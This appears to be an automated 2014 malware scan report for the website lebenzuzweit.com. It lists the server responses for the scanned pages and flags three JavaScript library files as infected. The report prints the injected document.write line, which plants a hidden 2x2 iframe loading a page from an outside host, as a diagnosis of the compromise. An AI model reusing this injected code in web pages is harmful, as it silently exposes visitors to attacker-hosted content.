Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lebenzuzweit.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lebenzuzweit.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:28 GMT Location: http://www.lebenzuzweit.com/ Server: nginx/1.4.7 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/ | 200 OK Content-Length: 4279 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/home.html | 200 OK Content-Length: 3396 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/reg/form.php | 200 OK Content-Length: 6797 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/reg/./js/jquery-1.3.2.min.js | 200 OK Content-Length: 57416 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D. Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418> | ||
http://www.lebenzuzweit.com/reg/./js/jquery-ui-1.7.2.custom.min.js | 200 OK Content-Length: 63997 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[ Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418> | ||
http://www.lebenzuzweit.com/reg/./js/date_de.js | 200 OK Content-Length: 983 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418></iframe>');
jQuery(function($){ $.datepicker.regional['de'] = { closeText: 'schlieÃen', prevText: '<zurück', nextText: 'Vor>', currentText: 'heute', monthNames: ['Januar','Februar','März','April','Mai','Juni','Juli','August','September','Oktober','November','Dezember'], monthNamesShort: ['Jan','Feb','Mär','Apr','Mai','Jun','Jul','Aug','Sep','Okt','Nov','Dez'], dayNames: ['Sonntag','Montag','Dienstag','Mittwoch','Donnerstag','Freitag','Samstag'], dayNamesShort: ['So','Mo','Di','Mi','Do','Fr','Sa'], dayNamesMin: ['So','Mo','Di','Mi','Do','Fr','Sa'], dateFormat: 'dd.mm.yy', firstDay: 1, isRTL: false}; $.datepicker.setDefaults($.datepicker.regional['de']); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://wypromuj.nazwa.pl/cmof.html?j=3364418 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wypromuj.nazwa.pl/cmof.html?j=3364418> | ||
http://www.lebenzuzweit.com/reg/df.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Pragma: no-cache Location: form.php Server: nginx/1.4.7 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=395f0d7a2a8e0acf14b2d142502aba9a; path=/ | clean |
http://www.lebenzuzweit.com/test404page.js | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
http://lebenzuzweit.com/about.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Location: http://www.lebenzuzweit.com/about.html Server: nginx/1.4.7 Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/about.html | 200 OK Content-Length: 6734 Content-Type: text/html | clean |
http://lebenzuzweit.com/weitere.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:33 GMT Location: http://www.lebenzuzweit.com/weitere.html Server: nginx/1.4.7 Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/weitere.html | 200 OK Content-Length: 3950 Content-Type: text/html | clean |
http://lebenzuzweit.com/foto/foto.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:36 GMT Location: http://www.lebenzuzweit.com/foto/foto.html Server: nginx/1.4.7 Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/foto.html | 200 OK Content-Length: 4143 Content-Type: text/html | clean |
http://www.lebenzuzweit.com/foto/js/prototype.js | 200 OK Content-Length: 126132 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder Server: nginx/1.4.7 Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/js/lightbox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/js/lightbox.js Server: nginx/1.4.7 Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/js/lightbox.js | 200 OK Content-Length: 18389 Content-Type: application/x-javascript | clean |
http://lebenzuzweit.com/foto/Oksana492x.jpg | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/Oksana492x.jpg Server: nginx/1.4.7 Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/oksana492x.jpg | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
http://lebenzuzweit.com/foto/Natalya141x.jpg | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Sep 2014 22:42:39 GMT Location: http://www.lebenzuzweit.com/foto/Natalya141x.jpg Server: nginx/1.4.7 Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lebenzuzweit.com/foto/natalya141x.jpg | 404 Not Found Content-Length: 1057 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lebenzuzweit.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Sep 2014 22:42:28 GMT
Location: http://www.lebenzuzweit.com/
Server: nginx/1.4.7
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: lebenzuzweit.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Sep 2014 22:42:28 GMT
Location: http://www.lebenzuzweit.com/
Server: nginx/1.4.7
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lebenzuzweit.com
Referer: http://www.google.com/search?q=lebenzuzweit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lebenzuzweit.com
Referer: http://www.google.com/search?q=lebenzuzweit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.